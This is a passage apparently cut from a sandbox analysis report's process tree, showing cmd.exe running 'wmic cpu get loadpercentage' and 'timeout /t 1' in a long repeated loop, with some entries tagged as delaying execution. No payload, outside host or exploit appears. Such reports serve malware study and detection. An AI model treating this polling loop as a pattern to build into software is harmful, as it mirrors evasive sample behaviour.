    PID:764
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2120
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1852
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2928
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4412
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3364
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3476
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4276
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2116
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4792
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3520
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1208
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3496
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2384
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:524
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1012
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:424
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3480
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2868
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3536
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3084
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1144
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2248
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4332
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:344
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1880
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:708
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4176
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4712
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2424
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5056
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3428
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4016
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4232
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3628
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4804
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4004
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2676
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4236
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2952
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2664
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1048
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3188
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:372
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3480
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:96
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:164
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4820
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:308
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2688
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2352
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3228
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:196
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3116
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:192
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2136
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2724
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:496
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5040
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4616
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1092
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2748
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3492
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4636
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4628
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:752
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:764
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3768
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1904
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1128
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1252
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4652
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:944
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:5064
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3452
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4588
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3524
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4124
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4236
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:2664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1980
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3188
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3844
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:1368
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4688
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2772
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:96
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2104
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1744
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4728
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3808
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5032
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4648
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1868
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1316
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2756
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3032
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4332
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1968
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1132
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:704
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1924
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2292
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1780
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4116
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3276
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4416
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1956
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:5080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4800
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1264
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4284
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2424
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1468
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4336
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3852
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3856
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1140
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4460
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4108
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1020
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4008
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4680
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4016
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3516
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4056
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4632
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2708
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1292
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4256
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1080
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2636
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3920
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1148
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4780
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4328
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:392
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3204
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:908
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4644
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1084
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1348
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:224
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4100
